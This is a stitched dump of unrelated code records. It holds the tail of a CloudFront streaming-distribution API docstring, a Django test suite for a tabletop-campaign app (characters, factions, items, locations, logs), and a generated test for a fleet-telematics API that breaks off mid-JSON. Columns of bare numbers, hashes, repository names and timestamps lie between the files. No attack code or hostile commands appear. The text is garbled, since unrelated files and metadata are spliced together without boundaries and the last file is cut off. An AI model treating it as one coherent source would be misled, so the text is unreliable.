request (ignoring white space), the response includes the same information returned to the original request. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution but the content of the StreamingDistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error. S3Origin (dict) -- [REQUIRED]A complex type that contains information about the Amazon S3 bucket from which you want CloudFront to get your media files for distribution. DomainName (string) -- [REQUIRED]The DNS name of the Amazon S3 origin. OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the RTMP distribution. Use an origin access identity to configure the distribution so that end users can only access objects in an Amazon S3 bucket through CloudFront. If you want end users to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element. To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element. To replace the origin access identity, update the distribution configuration and specify the new origin access identity. For more information, see Using an Origin Access Identity to Restrict Access to Your Amazon S3 Content in the Amazon Amazon CloudFront Developer Guide . Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this streaming distribution. Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution. Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution. (string) -- Comment (string) -- [REQUIRED]Any comments you want to include about the streaming distribution. Logging (dict) --A complex type that controls whether access logs are written for the streaming distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a streaming distribution or if you want to disable logging for an existing streaming distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted. Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com . Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this streaming distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element. TrustedSigners (dict) -- [REQUIRED]A complex type that specifies any AWS accounts that you want to permit to create signed URLs for private content. If you want the distribution to use signed URLs, include this element; if you want the distribution to use public URLs, remove this element. For more information, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide . Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- PriceClass (string) --A complex type that contains information about price class for this streaming distribution. Enabled (boolean) -- [REQUIRED]Whether the streaming distribution is enabled to accept user requests for content. :type Id: string :param Id: [REQUIRED] The streaming distribution's id. :type IfMatch: string :param IfMatch: The value of the ETag header that you received when retrieving the streaming distribution's configuration. For example: E2QWRUHAPOMQZL . :rtype: dict :return: { 'StreamingDistribution': { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'DomainName': 'string', 'ActiveTrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ { 'AwsAccountNumber': 'string', 'KeyPairIds': { 'Quantity': 123, 'Items': [ 'string', ] } }, ] }, 'StreamingDistributionConfig': { 'CallerReference': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False } }, 'ETag': 'string' } :returns: self , which is the AWS account used to create the distribution. An AWS account number. """ pass
68.461109
813
0.5769
34,819
330,941
5.476435
0.026595
0.012922
0.021145
0.016194
0.969295
0.966515
0.963668
0.958969
0.956021
0.952398
0
0.010428
0.362796
330,941
4,833
814
68.475274
0.893815
0.936179
0
0.5
0
0
0
0
0
0
0
0
0
1
0.5
false
0.5
0
0
0.5
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
9
50c1b49da17e3998cd829361313fa015981b2fff
18,167
py
Python
campaign/test/test_views.py
devenney/reverie
43b2948678ff1e76a1b7a9cab812c0dfbf3633a0
[ "MIT" ]
null
null
null
campaign/test/test_views.py
devenney/reverie
43b2948678ff1e76a1b7a9cab812c0dfbf3633a0
[ "MIT" ]
47
2017-08-30T00:33:20.000Z
2018-03-09T07:38:39.000Z
campaign/test/test_views.py
devenney/reverie
43b2948678ff1e76a1b7a9cab812c0dfbf3633a0
[ "MIT" ]
null
null
null
from datetime import datetime from django.contrib.auth.models import User from django.shortcuts import get_object_or_404 from django.template.defaultfilters import slugify from django.test import TestCase from django.urls import reverse from campaign.models import Campaign, Character, Faction, Item, Location, Log GM_USER = 'gm' PLAYER_USER = 'player' NOT_PLAYER_USER = 'not_player' TEST_PASSWORD = 'password' TEST_USERS = [GM_USER, PLAYER_USER, NOT_PLAYER_USER] TEST_CAMPAIGN = { 'name': 'Public Campaign', 'gm_id': TEST_USERS.index(GM_USER), 'tagline': 'Test Tagline', 'description': 'Test Description', 'players': [TEST_USERS.index(PLAYER_USER)], 'public': True, } TEST_PLAYER_CHARACTER = { 'name': 'Test Player Character', 'tagline': 'Test Tagline', 'description': 'Test Description', 'player': TEST_USERS.index(PLAYER_USER), 'campaign_slug': 1, 'is_pc': True, } TEST_NON_PLAYER_CHARACTER = { 'name': 'Test Non-Player Character', 'tagline': 'Test Tagline', 'description': 'Test Description', 'player': TEST_USERS.index(PLAYER_USER), 'campaign_slug': 1, 'is_pc': False, } TEST_FACTION = { 'name': 'Test Faction', 'tagline': 'Test Tagline', 'description': 'Test Description', 'campaign_slug': 1, } TEST_ITEM = { 'name': 'Test Item', 'tagline': 'Test Tagline', 'description': 'Test Description', 'campaign_slug': 1, } TEST_LOCATION = { 'name': 'Test Location', 'tagline': 'Test Tagline', 'description': 'Test Description', 'campaign_slug': 1, } TEST_LOG = { 'name': 'Test Log', 'description': 'Test Description', 'date': '01/01/2001', 'campaign_slug': 1, } class CampaignViewTest(TestCase): """ Test cases related to the Character view. """ def setUp(self): # Create Users for idx, user in enumerate(TEST_USERS): User.objects.create_user( id=TEST_USERS.index(user), password=TEST_PASSWORD, username=user, ) def test_create_campaign(self): self.client.login(username=GM_USER, password=TEST_PASSWORD) # Create Campaigns response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN) self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))})) self.campaign = Campaign.objects.get(name = 'Public Campaign') # Logout self.client.logout() def test_invalid_campaign_entry(self): # Missing name bad_campaign_form = { 'gm_id': TEST_USERS.index(GM_USER), 'tagline': 'Test Tagline', 'description': 'Test Description', 'players': [TEST_USERS.index(PLAYER_USER)], 'public': True, } self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:campaign_entry'), bad_campaign_form) self.assertEqual(response.status_code, 200) self.client.logout() class CharacterViewTest(TestCase): """ Test cases related to the Character view. """ def setUp(self): # Create Users for idx, user in enumerate(TEST_USERS): User.objects.create_user( id=TEST_USERS.index(user), password=TEST_PASSWORD, username=user, ) self.client.login(username=GM_USER, password=TEST_PASSWORD) # Create Campaigns response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN) self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))})) self.campaign = Campaign.objects.get(name = 'Public Campaign') # Create Characters response = self.client.post(reverse('campaign:character_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_PLAYER_CHARACTER) self.assertRedirects(response, reverse('campaign:character_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(TEST_PLAYER_CHARACTER.get("name"))})) self.player_character = Character.objects.get(name = 'Test Player Character') response = self.client.post(reverse('campaign:character_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_NON_PLAYER_CHARACTER) self.assertRedirects(response, reverse('campaign:character_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(TEST_NON_PLAYER_CHARACTER.get("name"))})) self.non_player_character = Character.objects.get(name = 'Test Non-Player Character') # Ensure character is visible response = self.client.get(reverse('campaign:character_list', kwargs={'campaign_slug': slugify(self.campaign.name)})) self.assertContains(response, 'Test Player Character', status_code=200) self.assertContains(response, 'Test Non-Player Character', status_code=200) # Logout self.client.logout() def test_invalid_character_entry(self): # Missing name bad_character_form = { 'tagline': 'Test tagline.', 'description': 'Test description', 'player': TEST_USERS.index(PLAYER_USER), 'campaign_slug': 1, } self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:character_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_character_form) self.assertEqual(response.status_code, 200) self.client.logout() def test_gm_edit_character(self): new_character = TEST_NON_PLAYER_CHARACTER new_character['tagline'] = 'New tagline!' self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:character_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.non_player_character.name)}), new_character) self.assertRedirects(response, reverse('campaign:character_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.non_player_character.name)})) character = Character.objects.get(slug=slugify(self.non_player_character.name)) self.assertEqual(character.tagline, 'New tagline!') self.client.logout() def test_player_edit_character(self): new_character = TEST_PLAYER_CHARACTER new_character['tagline'] = 'New tagline!' self.client.login(username=PLAYER_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:character_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.player_character.name)}), new_character) self.assertRedirects(response, reverse('campaign:character_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.player_character.name)})) character = Character.objects.get(slug=slugify(self.player_character.name)) self.assertEqual(character.tagline, 'New tagline!') self.client.logout() def test_not_player_edit_character(self): new_character = TEST_PLAYER_CHARACTER new_character['tagline'] = 'New tagline!' self.client.login(username=NOT_PLAYER_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:character_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'character_slug': slugify(self.player_character.name)}), new_character) self.assertEqual(response.status_code, 403) self.client.logout() class FactionViewTest(TestCase): """ Test cases related to the Faction view. """ def setUp(self): # Create Users for idx, user in enumerate(TEST_USERS): User.objects.create_user( id=TEST_USERS.index(user), password=TEST_PASSWORD, username=user, ) self.client.login(username=GM_USER, password=TEST_PASSWORD) # Create Campaigns response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN) self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))})) self.campaign = Campaign.objects.get(name = 'Public Campaign') # Create Factions response = self.client.post(reverse('campaign:faction_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_FACTION) self.assertRedirects(response, reverse('campaign:faction_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'faction_slug': slugify(TEST_FACTION.get("name"))})) self.faction = Faction.objects.get(name = 'Test Faction') # Ensure faction is visible response = self.client.get(reverse('campaign:faction_list', kwargs={'campaign_slug': slugify(self.campaign.name)})) self.assertContains(response, 'Test Faction', status_code=200) # Logout self.client.logout() def test_invalid_faction_entry(self): # Missing name bad_faction_form = { 'tagline': 'Test tagline.', 'description': 'Test description', 'campaign_slug': 1, } self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:faction_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_faction_form) self.assertEqual(response.status_code, 200) self.client.logout() def test_edit_faction(self): new_faction = TEST_FACTION new_faction['tagline'] = 'New tagline!' self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:faction_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'faction_slug': slugify(self.faction.name)}), new_faction) self.assertRedirects(response, reverse('campaign:faction_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'faction_slug': slugify(self.faction.name)})) faction = Faction.objects.get(slug=slugify(self.faction.name)) self.assertEqual(faction.tagline, 'New tagline!') self.client.logout() class ItemViewTest(TestCase): """ Test cases related to the Item view. """ def setUp(self): # Create Users for idx, user in enumerate(TEST_USERS): User.objects.create_user( id=TEST_USERS.index(user), password=TEST_PASSWORD, username=user, ) self.client.login(username=GM_USER, password=TEST_PASSWORD) # Create Campaigns response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN) self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))})) self.campaign = Campaign.objects.get(name = 'Public Campaign') # Create Items response = self.client.post(reverse('campaign:item_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_ITEM) self.assertRedirects(response, reverse('campaign:item_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'item_slug': slugify(TEST_ITEM.get("name"))})) self.item = Item.objects.get(name = 'Test Item') # Ensure item is visible response = self.client.get(reverse('campaign:item_list', kwargs={'campaign_slug': slugify(self.campaign.name)})) self.assertContains(response, 'Test Item', status_code=200) # Logout self.client.logout() def test_invalid_item_entry(self): # Missing name bad_item_form = { 'tagline': 'Test tagline.', 'description': 'Test description', 'campaign_slug': 1, } self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:item_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_item_form) self.assertEqual(response.status_code, 200) self.client.logout() def test_edit_item(self): new_item = TEST_ITEM new_item['tagline'] = 'New tagline!' self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:item_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'item_slug': slugify(self.item.name)}), new_item) self.assertRedirects(response, reverse('campaign:item_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'item_slug': slugify(self.item.name)})) item = Item.objects.get(slug=slugify(self.item.name)) self.assertEqual(item.tagline, 'New tagline!') self.client.logout() class LocationViewTest(TestCase): """ Test cases related to the Location view. """ def setUp(self): # Create Users for idx, user in enumerate(TEST_USERS): User.objects.create_user( id=TEST_USERS.index(user), password=TEST_PASSWORD, username=user, ) self.client.login(username=GM_USER, password=TEST_PASSWORD) # Create Campaigns response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN) self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))})) self.campaign = Campaign.objects.get(name = 'Public Campaign') # Create Locations response = self.client.post(reverse('campaign:location_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_LOCATION) self.assertRedirects(response, reverse('campaign:location_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'location_slug': slugify(TEST_LOCATION.get("name"))})) self.location = Location.objects.get(name = 'Test Location') # Ensure location is visible response = self.client.get(reverse('campaign:location_list', kwargs={'campaign_slug': slugify(self.campaign.name)})) self.assertContains(response, 'Test Location', status_code=200) # Logout self.client.logout() def test_invalid_location_entry(self): # Missing name bad_location_form = { 'tagline': 'Test tagline.', 'description': 'Test description', 'campaign_slug': 1, } self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:location_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_location_form) self.assertEqual(response.status_code, 200) self.client.logout() def test_edit_location(self): new_location = TEST_LOCATION new_location['tagline'] = 'New tagline!' self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:location_edit', kwargs={'campaign_slug': slugify(self.campaign.name), 'location_slug': slugify(self.location.name)}), new_location) self.assertRedirects(response, reverse('campaign:location_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'location_slug': slugify(self.location.name)})) location = Location.objects.get(slug=slugify(self.location.name)) self.assertEqual(location.tagline, 'New tagline!') self.client.logout() class LogViewTest(TestCase): """ Test cases related to the Log view. """ def setUp(self): # Create Users for idx, user in enumerate(TEST_USERS): User.objects.create_user( id=TEST_USERS.index(user), password=TEST_PASSWORD, username=user, ) self.client.login(username=GM_USER, password=TEST_PASSWORD) # Create Campaigns response = self.client.post(reverse('campaign:campaign_entry'), TEST_CAMPAIGN) self.assertRedirects(response, reverse('campaign:campaign_detail', kwargs={'campaign_slug': slugify(TEST_CAMPAIGN.get("name"))})) self.campaign = Campaign.objects.get(name = 'Public Campaign') # Create Logs response = self.client.post(reverse('campaign:log_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), TEST_LOG) self.assertRedirects(response, reverse('campaign:log_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'log_slug': slugify(TEST_LOG.get("name"))})) self.log = Log.objects.get(name = 'Test Log') # Ensure log is visible response = self.client.get(reverse('campaign:log_list', kwargs={'campaign_slug': slugify(self.campaign.name)})) self.assertContains(response, 'Test Log', status_code=200) # Logout self.client.logout() def test_invalid_log_entry(self): # Missing description bad_log_form = { 'name': 'Test Log', 'description': '', } self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:log_entry', kwargs={'campaign_slug': slugify(self.campaign.name)}), bad_log_form) self.assertEqual(response.status_code, 200) self.client.logout() def test_edit_log(self): new_log = TEST_LOG new_log['description'] = 'New description!' self.client.login(username=GM_USER, password=TEST_PASSWORD) response = self.client.post(reverse('campaign:log_edit', kwargs={'campaign_slug': slugify(self.campaign.slug), 'log_slug': slugify(self.log.slug)}), new_log) self.assertRedirects(response, reverse('campaign:log_detail', kwargs={'campaign_slug': slugify(self.campaign.name), 'log_slug': slugify(self.log.name)})) log = Log.objects.get(slug=slugify(self.log.name)) self.assertEqual(log.description, 'New description!') self.client.logout()
38.901499
200
0.673034
2,076
18,167
5.710019
0.04817
0.057365
0.068331
0.086469
0.864012
0.82681
0.806394
0.782605
0.761515
0.7589
0
0.004119
0.198217
18,167
466
201
38.984979
0.809694
0.041449
0
0.512027
0
0
0.188768
0.048374
0
0
0
0
0.127148
1
0.068729
false
0.089347
0.024055
0
0.113402
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
0fb8a921651efd2ce9fc008032222c41fe8f5834
13,466
py
Python
sdk/python/v0.1-rc.4/tests/controllers/test_use_case_carrier_custom_business_intelligence_controller.py
nmfta-repo/nmfta-opentelematics-prototype
729e9391879e273545a4818558677b2e47261f08
[ "Apache-2.0" ]
2
2021-12-15T08:37:03.000Z
2022-02-11T20:40:42.000Z
sdk/python/v0.1-rc.4/tests/controllers/test_use_case_carrier_custom_business_intelligence_controller.py
nmfta-repo/nmfta-opentelematics-prototype
729e9391879e273545a4818558677b2e47261f08
[ "Apache-2.0" ]
8
2019-12-04T22:56:46.000Z
2022-02-10T08:23:29.000Z
sdk/python/v0.1-rc.4/tests/controllers/test_use_case_carrier_custom_business_intelligence_controller.py
nmfta-repo/nmfta-opentelematics-prototype
729e9391879e273545a4818558677b2e47261f08
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ opentelematicsapi This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ). """ import jsonpickle import dateutil.parser from .controller_test_base import ControllerTestBase from ..test_helper import TestHelper from opentelematicsapi.api_helper import APIHelper class UseCaseCarrierCustomBusinessIntelligenceControllerTests(ControllerTestBase): @classmethod def setUpClass(cls): super(UseCaseCarrierCustomBusinessIntelligenceControllerTests, cls).setUpClass() cls.controller = cls.api_client.use_case_carrier_custom_business_intelligence # Clients can retrieve a combination of all vehicle information for all vehicles over a given time period. # #**Access Controls** # #|Role: |Vehicle Query|Vehicle Follow|Driver Query|Driver Follow|Driver Dispatch|Driver Duty |HR |Admin | #|-------|-------------|--------------|------------|-------------|---------------|------------|------------|------------| #|Access:| ALLOW | ALLOW | ALLOW | ALLOW | **DENY** | **DENY** | **DENY** | ALLOW | def test_get_fleet_vehicle_info_1(self): # Parameters for the API call start_time = '2019-04-05T02:04:16Z' stop_time = '2019-04-05T02:04:16Z' # Perform the API call through the SDK function result = self.controller.get_fleet_vehicle_info(start_time, stop_time) # Test response code self.assertEquals(self.response_catcher.response.status_code, 200) # Test headers expected_headers = {} expected_headers['content-type'] = None self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers)) # Test whether the captured response is as we expected self.assertIsNotNone(result) self.assertEqual('{ "coarseVehicleLocationTimeHistories": { "data": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "dateTime": "2019-04-05T02:04:16Z", "location": "37.4224764 -122.0842499" } ], "timeResolution": "TIMERESOLUTION_NOT_MAX" }, "flaggedVehicleFaultEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "location": "37.4224764 -122.0842499", "eventComment": "event type XXXX, (other details)", "triggeredDate": "2019-04-05T02:04:16Z", "clearedDate": "2019-04-05T02:04:16Z", "occurences": 1, "messageIdentifier": 128, "parameterOrSubsystemIdType": "PIDORSID_PID", "faultCodeParameterorSubsystemId": 0, "sourceAddress": 0, "suspectParameterNumber": 0, "failureModeIdentifier": 0, "urgentFlag": false, "odometer": 0, "engineRpm": 0, "ecmSpeed": 0, "cruiseStatus": { "ccSwitch": false, "ccSetSwitch": false, "ccCoastSwitch": false, "ccClutchSwitch": false, "ccCruiseSwitch": false, "ccResumeSwitch": false, "ccAccelerationSwitch": false, "ccBrakeSwitch": false, "ccSpeed": 1 }, "ignitionStatus": { "ignitionAccessory": false, "ignitionRunContact": false, "ignitionCrankContact": false, "ignitionAidContact": false }, "gpsQuality": "GPSQUALITY_FINELOCK", "clearType": "CLEARTYPE_BYSYSTEMS" } ], "vehiclePerformanceEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "eventStart": "2019-04-05T02:04:16Z", "eventEnd": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "eventComment": "performance event type XXXX, (other details)", "hours": 6.28, "thresholds": { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "activeFrom": "2019-04-05T02:04:16Z", "activeTo": "2019-04-05T02:04:16Z", "rpmOverValue": 0, "overSpeedValue": 0, "excessSpeedValue": 0, "longIdleValue": 300, "hiThrottleValue": 0 }, "odometerStart": 0, "odometerEnd": 0, "engineTime": 0, "movingTime": 0, "startFuel": 0, "endFuel": 0, "brakeApplications": 0, "engineLoadStopped": 0, "engineLoadMoving": 0, "headlightTime": 0, "speedGovernorValue": 0, "overRpmTime": 0, "overSpeedTime": 0, "excessSpeedTime": 0, "longIdleTime": 0, "shortIdleTime": 0, "shortIdleCount": 0, "longIdleFuel": 0, "shortIdleFuel": 0, "cruiseEvents": 0, "cruiseTime": 0, "cruiseFuel": 0, "cruiseDistance": 0, "topGearValue": 0, "topGearTime": 0, "topGearFuel": 0, "topGearDistance": 0, "ptoFuel": 0, "ptoTime": 0, "seatBeltTime": 0, "particulateFilterStatus": "`FILTERSTATUS_REGEN_NEEDED\'", "exhaustFluidLevel": 0, "overspeedLowThrottle": 0, "overspeedHiThrottle": 0, "overrpmLowThrottle": 0, "overrpmHiThrottle": 0, "lkaActive": false, "lkaDisable": false, "ldwActive": false, "ldwDisable": false } ], "vehicleFaultCodeEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "location": "37.4224764 -122.0842499", "eventComment": "event type XXXX, (other details)", "triggeredDate": "2019-04-05T02:04:16Z", "clearedDate": "2019-04-05T02:04:16Z", "occurences": 1, "messageIdentifier": 128, "parameterOrSubsystemIdType": "PIDORSID_PID", "faultCodeParameterorSubsystemId": 0, "sourceAddress": 0, "suspectParameterNumber": 0, "failureModeIdentifier": 0, "urgentFlag": false, "odometer": 0, "engineRpm": 0, "ecmSpeed": 0, "cruiseStatus": { "ccSwitch": false, "ccSetSwitch": false, "ccCoastSwitch": false, "ccClutchSwitch": false, "ccCruiseSwitch": false, "ccResumeSwitch": false, "ccAccelerationSwitch": false, "ccBrakeSwitch": false, "ccSpeed": 1 }, "ignitionStatus": { "ignitionAccessory": false, "ignitionRunContact": false, "ignitionCrankContact": false, "ignitionAidContact": false }, "gpsQuality": "GPSQUALITY_FINELOCK", "clearType": "CLEARTYPE_BYSYSTEMS" } ]}', self.response_catcher.response.raw_body) # Clients can follow a feed of a combination of all vehicle information for all vehicles as they are added to the TSP #system; following is accomplished via polling an endpoint and providing a 'token' which evolves the window of new #entries with each query in the polling. # #**Access Controls** # #|Role: |Vehicle Query|Vehicle Follow|Driver Query|Driver Follow|Driver Dispatch|Driver Duty |HR |Admin | #|-------|-------------|--------------|------------|-------------|---------------|------------|------------|------------| #|Access:| **DENY** | ALLOW | **DENY** | ALLOW | **DENY** | **DENY** | **DENY** | ALLOW | def test_follow_fleet_vehicle_info_1(self): # Parameters for the API call token = '37A6259CC0C1DAE299A7866489DFF0BD' # Perform the API call through the SDK function result = self.controller.follow_fleet_vehicle_info(token) # Test response code self.assertEquals(self.response_catcher.response.status_code, 200) # Test headers expected_headers = {} expected_headers['content-type'] = None self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers)) # Test whether the captured response is as we expected self.assertIsNotNone(result) self.assertEqual('{ "token": "", "feed": { "coarseVehicleLocationTimeHistories": { "data": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "dateTime": "2019-04-05T02:04:16Z", "location": "37.4224764 -122.0842499" } ], "timeResolution": "TIMERESOLUTION_NOT_MAX" }, "flaggedVehicleFaultEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "location": "37.4224764 -122.0842499", "eventComment": "event type XXXX, (other details)", "triggeredDate": "2019-04-05T02:04:16Z", "clearedDate": "2019-04-05T02:04:16Z", "occurences": 1, "messageIdentifier": 128, "parameterOrSubsystemIdType": "PIDORSID_PID", "faultCodeParameterorSubsystemId": 0, "sourceAddress": 0, "suspectParameterNumber": 0, "failureModeIdentifier": 0, "urgentFlag": false, "odometer": 0, "engineRpm": 0, "ecmSpeed": 0, "cruiseStatus": { "ccSwitch": false, "ccSetSwitch": false, "ccCoastSwitch": false, "ccClutchSwitch": false, "ccCruiseSwitch": false, "ccResumeSwitch": false, "ccAccelerationSwitch": false, "ccBrakeSwitch": false, "ccSpeed": 1 }, "ignitionStatus": { "ignitionAccessory": false, "ignitionRunContact": false, "ignitionCrankContact": false, "ignitionAidContact": false }, "gpsQuality": "GPSQUALITY_FINELOCK", "clearType": "CLEARTYPE_BYSYSTEMS" } ], "vehiclePerformanceEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "eventStart": "2019-04-05T02:04:16Z", "eventEnd": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "eventComment": "performance event type XXXX, (other details)", "hours": 6.28, "thresholds": { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "activeFrom": "2019-04-05T02:04:16Z", "activeTo": "2019-04-05T02:04:16Z", "rpmOverValue": 0, "overSpeedValue": 0, "excessSpeedValue": 0, "longIdleValue": 300, "hiThrottleValue": 0 }, "odometerStart": 0, "odometerEnd": 0, "engineTime": 0, "movingTime": 0, "startFuel": 0, "endFuel": 0, "brakeApplications": 0, "engineLoadStopped": 0, "engineLoadMoving": 0, "headlightTime": 0, "speedGovernorValue": 0, "overRpmTime": 0, "overSpeedTime": 0, "excessSpeedTime": 0, "longIdleTime": 0, "shortIdleTime": 0, "shortIdleCount": 0, "longIdleFuel": 0, "shortIdleFuel": 0, "cruiseEvents": 0, "cruiseTime": 0, "cruiseFuel": 0, "cruiseDistance": 0, "topGearValue": 0, "topGearTime": 0, "topGearFuel": 0, "topGearDistance": 0, "ptoFuel": 0, "ptoTime": 0, "seatBeltTime": 0, "particulateFilterStatus": "`FILTERSTATUS_REGEN_NEEDED\'", "exhaustFluidLevel": 0, "overspeedLowThrottle": 0, "overspeedHiThrottle": 0, "overrpmLowThrottle": 0, "overrpmHiThrottle": 0, "lkaActive": false, "lkaDisable": false, "ldwActive": false, "ldwDisable": false } ], "vehicleFaultCodeEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "location": "37.4224764 -122.0842499", "eventComment": "event type XXXX, (other details)", "triggeredDate": "2019-04-05T02:04:16Z", "clearedDate": "2019-04-05T02:04:16Z", "occurences": 1, "messageIdentifier": 128, "parameterOrSubsystemIdType": "PIDORSID_PID", "faultCodeParameterorSubsystemId": 0, "sourceAddress": 0, "suspectParameterNumber": 0, 